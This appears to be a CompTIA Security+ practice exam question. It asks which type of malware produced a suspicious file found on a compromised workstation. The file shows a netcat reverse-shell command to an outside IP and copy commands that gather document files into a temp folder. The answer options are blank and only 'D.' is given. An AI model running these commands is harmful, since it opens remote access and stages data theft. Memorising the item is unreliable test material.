Question 569 of 730 from exam SY0-601: CompTIA Security+


Question

A security analyst believes an employee's workstation has been compromised.

The analyst reviews the system logs, but does not find any attempted logins.

The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory.

The analyst finds a series of files that look suspicious.

One of the files contains the following commands:

cmd /C %TEMP$\nc -e cmd.exe 34.100.43.230
copy *.doc > $TEMP$\docfiles.zip
copy *.xls > $TEMP$\xlsfiles.zip
copy *.pdf > $TEMP$\pdffiles.zip

Which of the following types of malware was used?

Answers

Explanations

A. B. C. D.

D.